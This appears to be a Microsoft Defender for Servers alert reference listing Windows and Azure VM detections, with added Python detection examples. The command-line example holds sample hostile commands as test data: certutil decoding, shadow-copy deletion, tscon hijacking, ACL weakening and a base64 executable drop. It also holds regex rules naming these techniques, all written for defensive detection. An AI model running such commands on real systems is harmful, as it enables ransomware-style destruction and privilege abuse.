Alert (alert type): Fileless attack technique detected (VM_FilelessAttackTechnique.Windows)
Description: The memory of the process specified below contains evidence of a fileless attack technique. Fileless attacks are used by attackers to execute code while evading detection by security software. Specific behaviors include:
1) Shellcode, which is a small piece of code typically used as the payload in the exploitation of a software vulnerability.
2) Executable image injected into the process, such as in a code injection attack.
3) Active network connections. See NetworkConnections below for details.
4) Function calls to security sensitive operating system interfaces. See Capabilities below for referenced OS capabilities.
5) Process hollowing, which is a technique used by malware in which a legitimate process is loaded on the system to act as a container for hostile code.
6) Contains a thread that was started in a dynamically allocated code segment. This is a common pattern for process injection attacks.
MITRE tactics: Defense Evasion, Execution
Severity: High

Alert (alert type): Fileless attack toolkit detected (VM_FilelessAttackToolkit.Windows)
Description: The memory of the process specified contains a fileless attack toolkit: [toolkit name]. Fileless attack toolkits use techniques that minimize or eliminate traces of malware on disk, and greatly reduce the chances of detection by disk-based malware scanning solutions. Specific behaviors include:
1) Well-known toolkits and crypto mining software.
2) Shellcode, which is a small piece of code typically used as the payload in the exploitation of a software vulnerability.
3) Injected malicious executable in process memory.
MITRE tactics: Defense Evasion, Execution
Severity: Medium

Alert (alert type): High risk software detected
Description: Analysis of host data from %{Compromised Host} detected the usage of software that has been associated with the installation of malware in the past. A common technique utilized in the distribution of malicious software is to package it within otherwise benign tools such as the one seen in this alert. When you use these tools, the malware can be silently installed in the background.
MITRE tactics: -
Severity: Medium

Alert (alert type): Local Administrators group members were enumerated
Description: Machine logs indicate a successful enumeration on group %{Enumerated Group Domain Name}%{Enumerated Group Name}. Specifically, %{Enumerating User Domain Name}%{Enumerating User Name} remotely enumerated the members of the %{Enumerated Group Domain Name}%{Enumerated Group Name} group. This activity could either be legitimate activity, or an indication that a machine in your organization has been compromised and used to perform reconnaissance on %{vmname}.
MITRE tactics: -
Severity: Informational

Alert (alert type): Malicious firewall rule created by ZINC server implant [seen multiple times]
Description: A firewall rule was created using techniques that match a known actor, ZINC. The rule was possibly used to open a port on %{Compromised Host} to allow for Command & Control communications. This behavior was seen [x] times today on the following machines: [Machine names]
MITRE tactics: -
Severity: High


Alert (alert type): Malicious SQL activity
Description: Machine logs indicate that '%{process name}' was executed by account: %{user name}. This activity is considered malicious.
MITRE tactics: -
Severity: High

Alert (alert type): Multiple Domain Accounts Queried
Description: Analysis of host data has determined that an unusual number of distinct domain accounts are being queried within a short time period from %{Compromised Host}. This kind of activity could be legitimate, but can also be an indication of compromise.
MITRE tactics: -
Severity: Medium

Alert (alert type): Possible credential dumping detected [seen multiple times]
Description: Analysis of host data has detected the use of a native Windows tool (for example, sqldumper.exe) in a way that allows credentials to be extracted from memory. Attackers often use these techniques to extract credentials that they then further use for lateral movement and privilege escalation. This behavior was seen [x] times today on the following machines: [Machine names]
MITRE tactics: -
Severity: Medium

Alert (alert type): Potential attempt to bypass AppLocker detected
Description: Analysis of host data on %{Compromised Host} detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command-line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.
MITRE tactics: -
Severity: High

Alert (alert type): PsExec execution detected (VM_RunByPsExec)
Description: Analysis of host data indicates that the process %{Process Name} was executed by the PsExec utility. PsExec can be used for running processes remotely. This technique might be used for malicious purposes.
MITRE tactics: Lateral Movement, Execution
Severity: Informational

Alert (alert type): Ransomware indicators detected [seen multiple times]
Description: Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access. This behavior was seen [x] times today on the following machines: [Machine names]
MITRE tactics: -
Severity: High

Alert (alert type): Ransomware indicators detected
Description: Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.
MITRE tactics: -
Severity: High

Alert (alert type): Rare SVCHOST service group executed (VM_SvcHostRunInRareServiceGroup)
Description: The system process SVCHOST was observed running a rare service group. Malware often uses SVCHOST to masquerade its malicious activity.
MITRE tactics: Defense Evasion, Execution
Severity: Informational


Alert (alert type): Sticky keys attack detected
Description: Analysis of host data indicates that an attacker may be subverting an accessibility binary (for example sticky keys, onscreen keyboard, narrator) in order to provide backdoor access to the host %{Compromised Host}.
MITRE tactics: -
Severity: Medium

Alert (alert type): Successful brute force attack (VM_LoginBruteForceSuccess)
Description: Several sign-in attempts were detected from the same source. Some successfully authenticated to the host. This resembles a burst attack, in which an attacker performs numerous authentication attempts to find valid account credentials.
MITRE tactics: Exploitation
Severity: Medium/High

Alert (alert type): Suspect integrity level indicative of RDP hijacking
Description: Analysis of host data has detected tscon.exe running with SYSTEM privileges. This can be indicative of an attacker abusing this binary in order to switch context to any other logged on user on this host; it's a known attacker technique to compromise more user accounts and move laterally across a network.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspect service installation
Description: Analysis of host data has detected the installation of tscon.exe as a service. This binary being started as a service potentially allows an attacker to trivially switch to any other logged on user on this host by hijacking RDP connections; it's a known attacker technique to compromise more user accounts and move laterally across a network.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspected Kerberos Golden Ticket attack parameters observed
Description: Analysis of host data detected command-line parameters consistent with a Kerberos Golden Ticket attack.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious Account Creation Detected
Description: Analysis of host data on %{Compromised Host} detected creation or use of a local account %{Suspicious account name}: this account name closely resembles a standard Windows account or group name '%{Similar To Account Name}'. This is potentially a rogue account created by an attacker, so named in order to avoid being noticed by a human administrator.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious Activity Detected (VM_SuspiciousActivity)
Description: Analysis of host data has detected a sequence of one or more processes running on %{machine name} that have historically been associated with malicious activity. While individual commands may appear benign, the alert is scored based on an aggregation of these commands. This could either be legitimate activity, or an indication of a compromised host.
MITRE tactics: Execution
Severity: Medium

Alert (alert type): Suspicious authentication activity (VM_LoginBruteForceValidUserFailed)
Description: Although none of them succeeded, some of the accounts they used were recognized by the host. This resembles a dictionary attack, in which an attacker performs numerous authentication attempts using a dictionary of predefined account names and passwords in order to find valid credentials to access the host. This indicates that some of your host account names might exist in a well-known account name dictionary.
MITRE tactics: Probing
Severity: Medium
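The two sign-in alerts above, Successful brute force attack and Suspicious authentication activity, describe the same raw signal, a burst of authentication attempts from one source, and differ on whether any attempt succeeded and whether the account names tried are known to the host. The Python below is an added illustration of that triage; it is not Defender's detection logic and not code from this page. It runs over constructed logon events, and the source addresses, account names, the threshold of eight attempts within ten minutes, and the known-account list are all assumptions.

```python
"""Triage of a sign-in burst from one source: a successful brute force (some
attempt succeeded) versus a dictionary attack against recognised account names
(all failed, some names exist). Added example over constructed events."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class LogonEvent:
    time: datetime
    source: str     # address the attempt came from
    user: str       # account name presented
    success: bool   # True for a successful logon, False for a failure


def first_burst(events, window, min_attempts):
    """Return the first run of events that fits inside `window` and has at least
    `min_attempts` entries, or None if the source never reached that rate."""
    events = sorted(events, key=lambda e: e.time)
    end = 0
    for start in range(len(events)):
        while end < len(events) and events[end].time - events[start].time <= window:
            end += 1
        if end - start >= min_attempts:
            return events[start:end]
    return None


def classify_source(events, known_users, window=timedelta(minutes=10), min_attempts=8):
    """Verdict for one source, mirroring the two alert descriptions: a burst that
    contains a success is a successful brute force; a burst of failures in which
    some presented names are real accounts is a dictionary attack against valid
    users; failures against unknown names only are reported separately."""
    burst = first_burst(events, window, min_attempts)
    if burst is None:
        return None
    if any(e.success for e in burst):
        return "successful_brute_force"
    if any(e.user.lower() in known_users for e in burst):
        return "valid_user_failed"
    return "unknown_user_failed"


def triage(events, known_users, **kwargs):
    """Group events by source and return {source: verdict} for sources that trip a rule."""
    by_source = defaultdict(list)
    for e in events:
        by_source[e.source].append(e)
    verdicts = {}
    for source, evs in by_source.items():
        verdict = classify_source(evs, known_users, **kwargs)
        if verdict:
            verdicts[source] = verdict
    return verdicts


# --- constructed sample data (assumptions, not real log data) ---
KNOWN_USERS = {"administrator", "jsmith", "svc_sql"}
T0 = datetime(2023, 7, 24, 9, 0, 0)


def attempts(source, users, step_seconds=5, success_last=False):
    """One attempt per name, `step_seconds` apart; optionally the last one succeeds."""
    return [LogonEvent(T0 + timedelta(seconds=i * step_seconds), source, u,
                       success=(success_last and i == len(users) - 1))
            for i, u in enumerate(users)]


SAMPLE_EVENTS = (
    attempts("203.0.113.5", ["administrator"] * 11, success_last=True)            # guessing, then a hit
    + attempts("198.51.100.7", ["administrator", "backup", "svc_sql", "test"] * 3)  # dictionary, some real names
    + attempts("192.0.2.77", ["oracle", "ftpuser", "tomcat"] * 3)                  # dictionary, no real names
    + attempts("192.0.2.9", ["jsmith"] * 3)                                        # three typos: below threshold
)

if __name__ == "__main__":
    for source, verdict in triage(SAMPLE_EVENTS, KNOWN_USERS).items():
        print(f"{source:15} {verdict}")
```

The window and count are deliberately parameters: eight attempts spread an hour apart never form a burst, which is the difference between a user mistyping a password and the activity these two alerts describe.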


Alert (alert type): Suspicious code segment detected
Description: Indicates that a code segment has been allocated by using non-standard methods, such as reflective injection and process hollowing. The alert provides more characteristics of the code segment that have been processed to provide context for the capabilities and behaviors of the reported code segment.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious double extension file executed
Description: Analysis of host data indicates an execution of a process with a suspicious double extension. This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.
MITRE tactics: -
Severity: High

Alert (alert type): Suspicious download using Certutil detected [seen multiple times]
Description: Analysis of host data on %{Compromised Host} detected the use of certutil.exe, a built-in administrator utility, for the download of a binary instead of for its mainstream purpose, which relates to manipulating certificates and certificate data. Attackers are known to abuse the functionality of legitimate administrator tools to perform malicious actions, for example using certutil.exe to download and decode a malicious executable that is then subsequently executed. This behavior was seen [x] times today on the following machines: [Machine names]
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious download using Certutil detected
Description: Analysis of host data on %{Compromised Host} detected the use of certutil.exe, a built-in administrator utility, for the download of a binary instead of for its mainstream purpose, which relates to manipulating certificates and certificate data. Attackers are known to abuse the functionality of legitimate administrator tools to perform malicious actions, for example using certutil.exe to download and decode a malicious executable that is then subsequently executed.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious failed execution of custom script extension in your virtual machine (VM_CustomScriptExtensionSuspiciousFailure)
Description: Suspicious failure of a custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Such failures may be associated with malicious scripts run by this extension.
MITRE tactics: Execution
Severity: Medium

Alert (alert type): Suspicious PowerShell Activity Detected
Description: Analysis of host data detected a PowerShell script running on %{Compromised Host} that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.
MITRE tactics: -
Severity: High

Alert (alert type): Suspicious PowerShell cmdlets executed
Description: Analysis of host data indicates execution of known malicious PowerShell PowerSploit cmdlets.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious process executed [seen multiple times]
Description: Machine logs indicate that the suspicious process '%{Suspicious Process}' was running on the machine, often associated with attacker attempts to access credentials. This behavior was seen [x] times today on the following machines: [Machine names]
MITRE tactics: -
Severity: High


Alert (alert type): Suspicious process executed
Description: Machine logs indicate that the suspicious process '%{Suspicious Process}' was running on the machine, often associated with attacker attempts to access credentials.
MITRE tactics: -
Severity: High

Alert (alert type): Suspicious process name detected [seen multiple times]
Description: Analysis of host data on %{Compromised Host} detected a process whose name is suspicious, for example corresponding to a known attacker tool or named in a way that is suggestive of attacker tools that try to hide in plain sight. This process could be legitimate activity, or an indication that one of your machines has been compromised. This behavior was seen [x] times today on the following machines: [Machine names]
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious process name detected
Description: Analysis of host data on %{Compromised Host} detected a process whose name is suspicious, for example corresponding to a known attacker tool or named in a way that is suggestive of attacker tools that try to hide in plain sight. This process could be legitimate activity, or an indication that one of your machines has been compromised.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious process termination burst (VM_TaskkillBurst)
Description: Analysis of host data indicates a suspicious process termination burst in %{Machine Name}. Specifically, %{NumberOfCommands} processes were killed between %{Begin} and %{Ending}.
MITRE tactics: Defense Evasion
Severity: Low

Alert (alert type): Suspicious SQL activity
Description: Machine logs indicate that '%{process name}' was executed by account: %{user name}. This activity is uncommon with this account.
MITRE tactics: -
Severity: Medium

Alert (alert type): Suspicious SVCHOST process executed
Description: The system process SVCHOST was observed running in an abnormal context. Malware often uses SVCHOST to masquerade its malicious activity.
MITRE tactics: -
Severity: High

Alert (alert type): Suspicious system process executed (VM_SystemProcessInAbnormalContext)
Description: The system process %{process name} was observed running in an abnormal context. Malware often uses this process name to masquerade its malicious activity.
MITRE tactics: Defense Evasion, Execution
Severity: High

Alert (alert type): Suspicious Volume Shadow Copy Activity
Description: Analysis of host data has detected shadow copy deletion activity on the resource. Volume Shadow Copy (VSC) is an important artifact that stores data snapshots. Some malware, and specifically ransomware, targets VSC to sabotage backup strategies.
MITRE tactics: -
Severity: High
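Many of the Windows alerts above are described in terms of a command-line pattern: certutil.exe used to decode or download a binary, Cacls giving Everyone full access to system binaries, the FTP -s: switch, pcalua.exe -a, "net stop" against SharedAccess or Windows Security, a netsh firewall rule for an executable in a suspicious location, shadow copy deletion, tscon.exe running as SYSTEM, mshta.exe launching PowerShell, a double file extension, an anomalous mix of upper and lower case, and a base-64 encoded executable on the command line. The Python below is an added example, not Defender's detection logic and not code from this page: it writes each of those descriptions down as a heuristic and runs them over constructed process-creation events. The regular expressions, the case-flip threshold, the list of "suspicious" directories and every path and account name in the sample events are assumptions.

```python
"""Command-line heuristics for host alerts described on this page, run over
constructed process-creation events. Added example, not Defender's logic."""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str              # full path of the started process
    command_line: str
    parent_image: str = ""  # full path of the parent process, if known
    user: str = ""          # account the process runs as


I = re.IGNORECASE
# One regular expression per command-line pattern the alert descriptions call out (all assumed).
CMDLINE_RULES = [
    ("certutil_decode_or_download", re.compile(r"\bcertutil(\.exe)?\b.*\s-(decode|urlcache)\b", I)),
    ("cacls_everyone_on_system_binary",
     re.compile(r"\b(cacls|icacls)(\.exe)?\b.*\\system32\\(ftp|net|wscript|cscript|cmd)\.exe.*\beveryone:\(?f\)?", I)),
    ("ftp_script_switch", re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", I)),
    ("pcalua_launch", re.compile(r"\bpcalua(\.exe)?\b.*\s-a\s", I)),
    ("critical_service_stopped", re.compile(r'\bnet1?(\.exe)?\s+stop\s+(sharedaccess\b|"?windows security"?)', I)),
    ("firewall_rule_suspicious_location",   # program path under a user-writable directory (assumed list)
     re.compile(r'\bnetsh(\.exe)?\b.*advfirewall.*add\s+rule.*program="?[^"\s]*\\(temp|appdata|programdata|public|downloads)\\', I)),
    ("shadow_copy_deletion", re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)\b", I)),
    ("rdp_session_switch_tscon", re.compile(r"\btscon(\.exe)?\s+\d+\s+/dest:", I)),
]
DOUBLE_EXTENSION = re.compile(r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.(exe|scr|com|bat|vbs|js)$", I)
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def case_scrambled(cmd, min_letters=20, threshold=0.4):
    """Anomalous case mix: share of adjacent letter pairs that change case,
    judged only on command lines long enough for the ratio to mean something."""
    letters = [c for c in cmd if c.isalpha()]
    if len(letters) < min_letters:
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips / len(letters) > threshold


def contains_base64_executable(cmd):
    """True if any base64 run in the command line decodes to a PE image (MZ header)."""
    for run in BASE64_RUN.findall(cmd):
        try:
            blob = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        if blob.startswith(b"MZ"):
            return True
    return False


def analyze(ev):
    """Return the set of heuristic labels that fire for one process-creation event."""
    labels = {name for name, rx in CMDLINE_RULES if rx.search(ev.command_line)}
    if basename(ev.parent_image) == "mshta.exe" and basename(ev.image) in ("powershell.exe", "pwsh.exe"):
        labels.add("hta_launching_powershell")
    if DOUBLE_EXTENSION.search(ev.image):
        labels.add("double_extension_executable")
    if case_scrambled(ev.command_line):
        labels.add("case_scrambled_command_line")
    if contains_base64_executable(ev.command_line):
        labels.add("base64_encoded_executable")
    if "rdp_session_switch_tscon" in labels and ev.user.upper().endswith("SYSTEM"):
        labels.add("tscon_running_as_system")   # the RDP-hijacking indicator the page describes
    return labels


# --- constructed sample events (assumptions, not real telemetry) ---
B64_PE = base64.b64encode(b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 40).decode()  # stub PE header
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe"),
    ProcessEvent(r"C:\Windows\System32\cacls.exe", r"cacls C:\Windows\System32\ftp.exe /E /G Everyone:F"),
    ProcessEvent(r"C:\Windows\System32\ftp.exe", r"ftp -s:C:\Users\Public\get.txt"),
    ProcessEvent(r"C:\Windows\System32\pcalua.exe", r"pcalua.exe -a \\fileshare\tools\update.exe"),
    ProcessEvent(r"C:\Windows\System32\net.exe", 'net stop "Windows Security"'),
    ProcessEvent(r"C:\Windows\System32\netsh.exe",
                 r'netsh advfirewall firewall add rule name="upd" dir=in action=allow program="C:\Users\Public\svch0st.exe"'),
    ProcessEvent(r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcessEvent(r"C:\Windows\System32\tscon.exe", "tscon 2 /dest:rdp-tcp#5", user=r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell -w hidden -nop",
                 parent_image=r"C:\Windows\System32\mshta.exe"),
    ProcessEvent(r"C:\Users\alice\Downloads\invoice.pdf.exe", "invoice.pdf.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c PoWeRsHeLl -NoP -eNcOdEdCoMmAnD"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell -c [IO.File]::WriteAllBytes('C:\\Users\\Public\\a.exe',[Convert]::FromBase64String('{B64_PE}'))"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir C:\Users"),   # benign control
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{basename(ev.image):18} {sorted(analyze(ev)) or '-'}")
```

Two of the heuristics are not string matches and are worth noting: the base64 check decodes each candidate run and looks for the MZ header rather than trusting that a long alphanumeric run is a payload, and the tscon rule only becomes the RDP-hijacking indicator when the process runs as SYSTEM, which is the condition the description gives.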


Alert (alert type): Suspicious WindowPosition registry value detected
Description: Analysis of host data on %{Compromised Host} detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in nonvisible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664 (Hex: 0x0c000c00, corresponding to X-axis=0c00 and Y-axis=0c00) this places the console app's window in a non-visible section of the user's screen, in an area that is hidden from view below the visible start menu/taskbar. Known suspect hex values include, but are not limited to, c000c000.
MITRE tactics: -
Severity: Low

Alert (alert type): Suspiciously named process detected
Description: Analysis of host data on %{Compromised Host} detected a process whose name is very similar to but different from a very commonly run process (%{Similar To Process Name}). While this process could be benign, attackers are known to sometimes hide in plain sight by naming their malicious tools to resemble legitimate process names.
MITRE tactics: -
Severity: Medium

Alert (alert type): Unusual config reset in your virtual machine (VM_VMAccessUnusualConfigReset)
Description: An unusual config reset was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. While this action may be legitimate, attackers can try utilizing the VM Access extension to reset the configuration in your virtual machine and compromise it.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Unusual deletion of custom script extension in your virtual machine (VM_CustomScriptExtensionUnusualDeletion)
Description: Unusual deletion of a custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager.
MITRE tactics: Execution
Severity: Medium

Alert (alert type): Unusual execution of custom script extension in your virtual machine (VM_CustomScriptExtensionUnusualExecution)
Description: Unusual execution of a custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers may use custom script extensions to execute malicious code on your virtual machines via the Azure Resource Manager.
MITRE tactics: Execution
Severity: Medium

Alert (alert type): Unusual process execution detected
Description: Analysis of host data on %{Compromised Host} detected the execution of a process by %{User Name} that was unusual. Accounts such as %{User Name} tend to perform a limited set of operations; this execution was determined to be out of character and may be suspicious.
MITRE tactics: -
Severity: High
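Three alerts above turn on one registry value: the WDigest UseLogonCredential key set so that clear-text credentials are kept in LSA memory, a WindowPosition value such as 201329664 (0x0c000c00) that moves a console window off the visible desktop, and the suppression of the legal notice shown at logon. The Python below is an added example, not Defender's logic and not code from this page, that evaluates constructed registry-write events against those three conditions and carries the WindowPosition decode through. The WDigest key path is the one quoted on the page; the HKCU\Console location for WindowPosition, the split of the DWORD into a low-word X and a high-word Y read as signed 16-bit values, the legal-notice value names under Policies\System, the reading of an emptied value as suppression, and the 1920x1080 screen are all assumptions.

```python
"""Evaluate constructed registry-write events against the three registry-based
alert conditions described on this page. Added example, not Defender's logic."""
from dataclasses import dataclass
from typing import Optional, Union

# Quoted on the page.
WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
# Assumptions: the page names neither the console key nor the legal-notice value names.
CONSOLE_KEY = r"HKCU\Console"
LEGAL_NOTICE_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
LEGAL_NOTICE_VALUES = {"legalnoticecaption", "legalnoticetext"}


@dataclass(frozen=True)
class RegistryWrite:
    key: str                  # full key path
    value_name: str
    data: Union[int, str]     # REG_DWORD as int, REG_SZ as str


def decode_window_position(dword: int):
    """Split a WindowPosition DWORD into (x, y): low word X, high word Y, each
    read as a signed 16-bit value the way a console COORD is (assumption)."""
    dword &= 0xFFFFFFFF

    def signed16(v):
        return v - 0x10000 if v >= 0x8000 else v

    return signed16(dword & 0xFFFF), signed16(dword >> 16)


def is_offscreen(pos, screen=(1920, 1080)):
    """True when the window origin lies outside the visible desktop rectangle."""
    x, y = pos
    width, height = screen
    return x < 0 or y < 0 or x >= width or y >= height


def under(key: str, parent: str) -> bool:
    """Case-insensitive 'key is parent or a subkey of parent'."""
    key, parent = key.lower().rstrip("\\"), parent.lower().rstrip("\\")
    return key == parent or key.startswith(parent + "\\")


def evaluate(write: RegistryWrite, screen=(1920, 1080)) -> Optional[str]:
    """Map one registry write to the alert condition it satisfies, if any."""
    name = write.value_name.lower()
    if under(write.key, WDIGEST_KEY) and name == "uselogoncredential" and write.data == 1:
        return "wdigest_cleartext_credentials_enabled"      # page severity: Medium
    if under(write.key, CONSOLE_KEY) and name == "windowposition" and isinstance(write.data, int):
        if is_offscreen(decode_window_position(write.data), screen):
            return "console_window_positioned_offscreen"   # page severity: Low
    if under(write.key, LEGAL_NOTICE_KEY) and name in LEGAL_NOTICE_VALUES and write.data in ("", 0):
        return "logon_legal_notice_suppressed"             # page severity: Low
    return None


# --- constructed sample writes (assumptions, not real telemetry) ---
SAMPLE_WRITES = [
    RegistryWrite(WDIGEST_KEY, "UseLogonCredential", 1),
    RegistryWrite(WDIGEST_KEY, "UseLogonCredential", 0),                     # hardening direction, no alert
    RegistryWrite(CONSOLE_KEY + r"\%SystemRoot%_system32_cmd.exe", "WindowPosition", 201329664),  # 0x0c000c00 from the page
    RegistryWrite(CONSOLE_KEY, "WindowPosition", 0xC000C000),                # second value the page lists
    RegistryWrite(CONSOLE_KEY, "WindowPosition", 0x00640064),                # (100, 100): visible, no alert
    RegistryWrite(LEGAL_NOTICE_KEY, "LegalNoticeText", ""),
]

if __name__ == "__main__":
    for w in SAMPLE_WRITES:
        print(f"{w.value_name:20} {w.data!r:>14} -> {evaluate(w)}")
```

Worked through, 201329664 splits into X = 0x0c00 = 3072 and Y = 0x0c00 = 3072, far past a 1920x1080 desktop, and c000c000 reads as (-16384, -16384), above and to the left of it; both land off screen, which is what the description means by a window hidden from view.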


Alert (alert type): Unusual user password reset in your virtual machine (VM_VMAccessUnusualPasswordReset)
Description: An unusual user password reset was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. While this action may be legitimate, attackers can try utilizing the VM Access extension to reset the credentials of a local user in your virtual machine and compromise it.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Unusual user SSH key reset in your virtual machine (VM_VMAccessUnusualSSHReset)
Description: An unusual user SSH key reset was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. While this action may be legitimate, attackers can try utilizing the VM Access extension to reset the SSH key of a user account in your virtual machine and compromise it.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): VBScript HTTP object allocation detected
Description: Creation of a VBScript file using Command Prompt has been detected. The following script contains an HTTP object allocation command. This action can be used to download malicious files.
MITRE tactics: -
Severity: High


Alerts for Linux machines


Microsoft Defender for Servers Plan 2 provides unique detections and alerts, in addition to the ones provided by Microsoft Defender for Endpoint. The alerts provided for Linux machines are:


Further details and notes 


Alert (alert type): a history file has been cleared
Description: Analysis of host data indicates that the command history log file has been cleared. Attackers may do this to cover their traces. The operation was performed by user: '%{user name}'.
MITRE tactics: -
Severity: Medium

Alert (alert type): Antimalware broad files exclusion in your virtual machine (VM_AmBroadFilesExclusion)
Description: Files exclusion from the antimalware extension with a broad exclusion rule was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Such an exclusion practically disables the antimalware protection. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running arbitrary code or infecting the machine with malware.
MITRE tactics: -
Severity: Medium


| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Antimalware disabled and code execution in your virtual machine (VM_AmDisablementAndCodeExecution) | Antimalware disabled at the same time as code execution on your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers disable antimalware scanners to prevent detection while running unauthorized tools or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware disabled in your virtual machine (VM_AmDisablement) | Antimalware disabled in your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might disable the antimalware on your virtual machine to prevent detection. | Defense Evasion | Medium |
| Antimalware file exclusion and code execution in your virtual machine (VM_AmFileExclusionAndCodeExecution) | File excluded from your antimalware scanner at the same time as code was executed via a custom script extension on your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running unauthorized tools or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware file exclusion and code execution in your virtual machine (VM_AmTempFileExclusionAndCodeExecution) | Temporary file exclusion from antimalware extension in parallel to execution of code via custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware file exclusion in your virtual machine (VM_AmTempFileExclusion) | File excluded from your antimalware scanner on your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might exclude files from the antimalware scan on your virtual machine to prevent detection while running unauthorized tools or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware real-time protection was disabled in your virtual machine (VM_AmRealtimeProtectionDisabled) | Real-time protection disablement of the antimalware extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might disable real-time protection from the antimalware scan on your virtual machine to avoid detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |



| Alert (alert type) | Description | MITRE tactics (Learn more) | Severity |
|---|---|---|---|
| Antimalware real-time protection was disabled temporarily in your virtual machine (VM_AmTempRealtimeProtectionDisablement) | Real-time protection temporary disablement of the antimalware extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might disable real-time protection from the antimalware scan on your virtual machine to avoid detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware real-time protection was disabled temporarily while code was executed in your virtual machine (VM_AmRealtimeProtectionDisablementAndCodeExec) | Real-time protection temporary disablement of the antimalware extension in parallel to code execution via custom script extension was detected in your virtual machine by analyzing the Azure Resource Manager operations in your subscription. Attackers might disable real-time protection from the antimalware scan on your virtual machine to avoid detection while running arbitrary code or infecting the machine with malware. | Defense Evasion, Execution | High |
| Antimalware scans blocked for files potentially related to malware campaigns on your virtual machine (Preview) (VM_AmMalwareCampaignRelatedExclusion) | An exclusion rule was detected in your virtual machine to prevent your antimalware extension scanning certain files that are suspected of being related to a malware campaign. The rule was detected by analyzing the Azure Resource Manager operations in your subscription. Attackers might exclude files from antimalware scans to prevent detection while running arbitrary code or infecting the machine with malware. | Defense Evasion | Medium |
| Antimalware temporarily disabled in your virtual machine (VM_AmTemporarilyDisablement) | Antimalware temporarily disabled in your virtual machine. This was detected by analyzing Azure Resource Manager operations in your subscription. Attackers might disable the antimalware on your virtual machine to prevent detection. | - | Medium |
